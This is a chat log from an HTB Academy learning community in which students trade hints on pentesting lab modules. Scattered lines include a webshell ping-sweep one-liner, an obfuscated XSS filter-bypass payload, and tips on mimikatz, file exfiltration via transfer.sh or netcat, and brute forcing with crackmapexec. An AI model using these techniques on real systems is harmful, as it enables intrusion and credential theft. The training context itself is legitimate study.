welp thats the module Im about to start so maybe ill have something later
but odd that finding the parameter is the sticking point
Is this for question 1?
I feel kind of stupid right now not being able to find a php.ini file
yes
The format of your answer will be /xxx/xxxx/xx/xxxxxx/php.ini
Does that help my dude?
the whole time
no fuzz lol

the second question has you editing the file
ok i did the first question
The script in INTRODUCTION TO BASH SCRIPTING / Flow Control - Loops throws the following error for me. Is that a result of the incorrect salt being passed, or is something incorrectly configured in pwnbox?
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
140356658070848:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:
^ scratch that. It was just an incorrect salt value.
Nice Job 
exit
Hi
has anybody done the socksoverrdp thing in pivoting tunneling ?
when I unzip the SocksOverRDP directory the .dll file keeps disappearing from the pivot...
nvm defender was deleting it
I'm doing well
aight could someone help me w/ socksoverrdp? I can't get it to work and I don't understand what I'm doing wrong
I'm doing well
I think I misconfigured proxifier because it doesn't seem to detect mstsc's attempt to connect
but I can't figure out what I did wrong
no one?
Which module is that?
What exactly is your issue?
I think I don't understand how to connect to the machine that has the flag
what address am I supposed to use in mstsc.exe?
Enumerate that service further. Hint: ||check the banner||
My notes are weird for that one, but the way it goes is foothold machine -> ping sweep network to find hosts -> connect to new host; repeat
DM me if you need more help
DM me what you found
yo
I'm trying to run for i in {1..254} ; do (ping -c 1 172.16.5.$i | grep "bytes from" & );done through a webshell
but for some reason it doesn't loop, $i just takes {1..254} as a value
any ideas why?
I am stuck also there 😩 run rpcclient with user/pass and the group its assigned, it doesn't match the answer
What shell are you using?
it's alright i found a workaround
Cool
Anyone here read "hacking the art of exploitation" 2nd edition ? And is it good for starting to get into hacking ?
It's probably good if you like learning from books
There are definitely better resources tho
can you send me some of the better resources ?
Hi all, Im doing ICMP Tunneling with SOCKS section in Pivoting, Tunneling, and Port Forwarding Module, and when I transfer ptunnel-ng to ubuntu server, it gives me this error: ./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
Any hint?
This is necessary to complete the exercise
Any of the reputable ones are great: HTB, HTB Academy, THM, Cyber Mentor, PortSwigger, and probably many more, but these come to mind right now.
As for books, that depends on what you're after, and I don't really know many, but Network Security Assessment is really good, and I've seen a few others recommended
I had another issue with the tool, and I couldn't get it to work. You can, however, complete the exercise in other ways
yep, thats what I did
Who can hack instagram accounts?
Can someone help explain some bash scripting to me?
Introduction to Bash Scripting -> Conditional Execution
Got the answer, but could use someone experienced to help explain how the loop works
Malicious request that 🤨
DM me
No no my gf lost her instagram
Riiiight ahahaha
Could you do that
We both know this is not true
if you are not here to learn then it's not the right place for you
Ok fuck that she just cheated on me
if she did there are multiple legit ways get it back
the gf or the instagram?
Look, we are not going to help or give advice on illegal activities
Bur you know how?
++kick 1007292874402037870 continued asking for help in illegal activities
Mos got the boot!
try this before uploading the tool to the ubuntu server this work for me and yep the first time i also use a different way to complete this section git clone https://github.com/utoni/ptunnel-ng.git;cd ptunnel-ng;sudo ./autogen.sh
is there a "good" way of getting files from a machine you pivoted to back to your host? Or do I have to upload them back to the pivot then to my host?
asking for the pivoting tunneling skills assessment
you could use wget, curl
or netcat
lots of ways
all of these commands allow to upload a file
but would that work? since my machine and the host aren't on the same network?
in that network you have to go through multiple machine
maybe it's a dumb question sorry 😅
or you can upload ||mimikatz|| to that machine
uploading with internet connection you can use transfer.sh or something
ah man that's what i was looking for!!
i remembered pypykatz but the machine doesn't have python on it
you have a shell in the machine?
using what
i have rdp to the machine
i bet with autoroute and proxychains
oh nice, not the best for privacy but good for ctf (with internet) thanks
mimikatz throws errors 😦
well, machine died anyway time for a break
@pliant sage if rpivot works tell me
oh rpivot definitely works
@pliant sage ok, rpivot did not work on my side so i had to use another method
for the client on the pivot I used the pre-built one, not the github cloned one
hello all. how do I navigate to the academy footprinting medium lab questions here on discord ?
There's no module-specific channels, but you can use the search functionality of discord
thx will do
Dm if you need help
hey guys i need help with the footprinting easy lab. So ive done the enumeration and i got back 2 ftp ports. If i try to connect via ftp user@<ip> and then login it directly enters passive mode and . With wget i got the folder .ssh which has my public and private key. Now i have to give the public key to the ssh but how?? Thanks for any help.
forget what i said rpivot is making xfreerdp run as smoothly as sandpaper it's a nightmare
@pliant sage so it took time to work
first pls remove the port and some spoiler stuff and for the ftp try ftp IP and you can enter the cred in and for the ssh if you got the private key you can just use that to login
so i have to upload my public key via ftp to the server
nope you don't need to do that just get the ||private key|| and use that to login
but how??
by login to ftp first
if i go for ssh -i id_rsa.pub ceil@<ip> that doesnt work
i already have the keys
you can't use public key for that
then use the one without the .pub to login
not yours, the one you get on the ||ftp||
did it give you any error?
no connection refused
oh yeah i forgot about spoiler
private chat?
yep shoot me a dm
did
me too, now I am having problems with .dll about SocksOverRDP:
all i remember about that error is it just randomly appear and disappear
but i'll give that a check after i'm done helping some people
I will reset the target
make sure that you are executing the cmd prompt as an admin
also the ||AV|| for that machine is on
@rustic sage oh yeah i think this is the issue
Also make sure something on the system hasnt quarantined the file.
still AV warning
Real time protection was enabled xd
now it is working
Good day colleagues, I'm lost in the last Windows fundamentals test.
hi
what's the issue?
I couldn't solve the last test I'm stuck with the final questions
I don't understand what i miss in this module to have this response. Can someone help me ? https://academy.hackthebox.com/module/143/section/1486
you need to replace the <password here> with wley's actual password
Ho ok thanks !
normal that used ||theme for rev shell|| at getting started?
at windows fundamentals section ntfs vs share permissions first question - isn't the answer ||Server Message Block protocol||? But it says its wrong
One second, I might be able to help
DM Me if you still need help
On the PtT w/ Linux module and trying to figure out how to switch from carlos to the svt_workstations account. I’ve used kinit to transfer the ticket and keytabextract, which gave me the AES-256 hash, but not NTLM. I’ve not been able to crack the AES-256 hash so far. Any recommendations?
Nevermind. Tried keytabextract on the ._all.kt file and it gave me an NTLM hash.
Cannot
I've sent a request
One question, once a module is finished and a subscription is expired. Can I keep watching the updated content added to that module?
If you have complete the module, yes.
I have a question, about "shells & payloads - live engagement". There is any browser on the machine we are connected via rdp? Or we have to proceed, without browser?
Is there anything specific to cloud security? Like a road map or something
Always good to be mindful of AV in the real world as well.
Thank you so much
@gilded violet no problem
i cannot for the life of me figure out this password for the broken authentication module skills assessment. i either suck at filtering lists or i am deep in a rabbit hole
I am working on the brute forcing cookies section. I am stuck on the second question: Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer. can you help me out if you have done it? i feel like im just being really stupid
I can find the cookie to decode, decode it from url and notice that there are 2 parts, one that changes based on session, one that I think is the username encoded somehow. I for the life of me cant figure out where to go from there
if you having issue decoding the cookie just use CyberChef if you have decode the cookie change you can use the same role at ||question 1||
hint you aren't in a rabbit hole that's the right path ||if you got the right user|| and if you are having issue with filtering the wordlist re-check the section on that
@vital adder do u have notes about ACTIVE DIRECTORY ENUMERATION & ATTACKS / Bleeding Edge Vulnerabilities/ PetitPotam (MS-EFSRPC) attack?
nope (haven't done the module)
thank you.
okey, im having as problem with the last type of attack its not necessary to complete the section but i want to try it :/
i must admit, im quite lost, can I have another hint? the magic bytes dont seem to line up, Is it the same formula as shown in the module?
hey. not academy stuff but i can't write to the main channel so. what should i try if this doesn't go through the xss filter?
<img/src="funny.jpg"onload=java
script:eval(ale
rt('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))>
omfg jk, you just have to let the ai do the work, i figured it out
what magic bytes? if you are in CyberChef you just use the magic stick
Were you able to get the other two attacks to work?
yup
yah i just noticed that, as always it boils down to the dumbest thing xD. thank you for the help! I was about to spend all day brute forcing algorithms xD
I only got so far on the first where I couldnt read what was in the file on the admin desktop
when I get to stage 3 of the print nightmare it shits the bed
now it wont execute at all lol
you need to verify first before you can access the main channel use ++verify at #bot-commands
Kinda seems like an oversight that people who are not verified have access to the academy text channels
I think the forms have suggestions idk how active it is
tagged one of the staff during a sprint a spammers and suggested it but they didnt mention anything back about it
Can someone advise me on how I can start hacking apps?
depends on your definition of hacking and definition of apps
Android games
yeah no modules for that stuff
or what program do you use to modify the money, diamonds, gold in the online games?
not a module related question sorry, ask in a more appropriate location 🙂
where can i ask?
how can i use my own VM in section questions? instead of the pwnbox
yo yo on the module "PASSWORD ATTACKS" in "Pass the Ticket (PtT) from Linux"
the last question "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response"
i dont get it. I thought I found the right file. i used linikatz and nothing works.
any help?
You can launch the browser inside of Burpsuite. It's clunky, but it's a browser.
Quickest and probably easiest is to download virtual box, download either the kali or parrot virtualbox vm from their respective sites and boot it up
I have a question on the Windows Privilege Escalation for the SeDebugPrivilege section. I am currently RDP into the host with jordan user. When i go to check whoami /priv I do not have SeDebugPrivilege
just use it
right, i was more wondering how to access the VPN, i think i figured it out, downloaded setting from https://academy.hackthebox.com/vpn and connected inside VM
yeah yeah
install openvpn
and then openvpn filepath
Anyone managed to do the zap web fuzzing part of the module? I have been stuck for 2 days and it is driving me mad on why I can't get it working
FINALLY i found it... idk why it didnt work the first time but made it work
What is the name of the group that is present in the company data share permissions ACL by default? can i explain me
sorry man, i was at work.. i used python in a terminal to decode the cookie....did you figure that out?
always there for the assist, thanks alot man...yea i need to work on my wordlist commands
anyone tried using VirtualBox on Mac M1 chip?
i installed the dev preview and am trying to run parrotos on it, but its going extremely slow, seems to be stuck on boot
now im seeing this
Did you install the ARM version of Parrot OS?
yes
oh wait
no
amd
im using the security edition, theres only an amd option
Only ARM works for M1 Macs. You can do an x86 Parrot OS docker container since the docker software runs using Rosetta. But afaik VMs need to be ARM
ooofff... only ARM isos work?
Yeah. Some software is missing in the ARM version. Also compiling exploits will not work unless you compile it on the target machine itself. That’s why I keep a Parrot OS docker image handy
is this only an issue with parrot os? can i try a different distro?
hello someone who has already done the FILE UPLOAD ATTACKS module
whats up
@karmic mantle so, any distro I want to run must be ARM?
could you help me with Skills Assessment
yea where are you stuck
hola
Yeah. The M1 Chip is an ARM chip. So only ARM distros work on it.
in the beginning
@karmic mantle now im getting this issue
how do we know if the integrity of a pro lab machine has not been altered? I have found creds for a user but they wont work
Can people legally pay hackers to do their hacking work
Working on the exercise section for active subdomain enumeration, currently getting server refusal messages when attempting to query inlanefreight.htb
More error messages like that, any nudge in the right direction?
your nslookup is trying to check with the 1.1.1.1 dns server which isnt going to know anything about an internal domain.
oh, so i should add the address of the spawn target to that command?
youd need to select it as your dns server for the command yeah
wheres the best place to ask a noob question related to htb academy?
a bit late but if you still need a hint for that module then ||XXE||
just at the beginning of AD Enumeration & Attacks, but confused on something I think is simple
connected to the VPN, and then used xfreerdp to get on the Linux attack host... but can't seem to launch wireshark with enough permissions to listen on the relevant interfaces
what am I missing? shouldn't i be able to launch wireshark and capture, as the instructions indicate?
nevermind, issue resolved... 4th or so attempt at pasting in the password for the htb-student user and it launched correctly
Anyone able to get the PrintNightmare exploit, in Active Directory --Bleeding Edge Vulnerabilities-- to work? I get an error from python once the windows box tries to connect back to my share. I was hoping someone else has some insight on this? Thanks!
yo. quick one, can someone DM me please?
I have to answer as part of Meterpreter Tunneling & Port Forwarding: Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
I have completed this and am on the windows box.... Im just not seeing the correct route that autoroute is providing.
wtf why does some bruteforcing programs dont stop, after a password is found ?
Examples:
crackmapexec winrm IP -u 'USERNAME' -p mylist.txt
or:
crowbar --server IP -u USER -C FILE -b rdp -v
i mean.. why ?!
you didnt tell it to stop probably. though crackmap stops automatically.. wasnt it hydra that doesnt? might be the other way around but either way. there should be a switch to get it to stop
the funny thing is, crackmapexec with smb stopped immediately. Exact same command, just smb instead of winrm. LOL ?
i would recommend having a look at the help on that proto. so like crackmapexec winrm help
else they have a discord. the makers of crackmap i mean. they are super helpful and fast at it too
@vital adder i see you there lurking haha.
i was to lazy to type so i was looking for this #modules message
try this it help the other guy with the same issue #modules message
also i'm pretty sure it's the other way around and i do remember have to deal with crackmapexec not stopping (not all crackmapexec option is like this)
if crackmapexec isn't stopping after it found the right cred you can add a grep command at the end to filter out Pwned! or the thing that crackmapexec give then it found the right cred
but with this you can't see the verbose
wdym not seeing the correct route?
yay
Yo thanks. For everyone, until we know why:
crackmapexec | grep 'Pwned!'
crowbar
- doesnt have a 'stop-switch' until now
- BUT creates crowbar.log (bad-pw) & crowbar.out (correct-pw) in current dir
Hey guys, anybody completed the Windows fundamentals skill assessment?
Not some direction to complete that section of the module.
here I am at the Footprinting Hard Lab. I can see ssh/pop3/imap ports open but I have no credentials to get in. SNMP is not present. Is bruteforcing the next step ?
@modern ridge use onesixtyone tool
i did. and since SNMP is not running the tool return nothing. I guess they changed that
only ssh pop or imap. thats it
hi guys, i'm new here
hi. same
so yeah. onesixtyone returns nada
actually it's my first time on discord
welcome. then.
thanks
try a nmap UDP scan
that i havent. will do now
@modern ridge look in seclist u will find the list that u can use
thx will do
progress. at last
@modern ridge so u got it
halfway yes. found stuff. thanks
got it boss !
Hard lab completed ! oof
Good day, I am confused, in the Occam's Razor section in Learning Process module, what is the point of Occam's in talking about SQL injection being the same in terms of concept but the individual steps being complicated?
I mean, I understand that Occam's razor is saying not to assume what is not, i.e the simplest explanation is probably the best one.
I can't seem to understand the point in using the SQL injection/pentesting explanation side by side Occam's.
I don't understand that section.
@modern ridge ok
@worn tusk look in var
yeah i did but still showing wrong
hint ||environment||

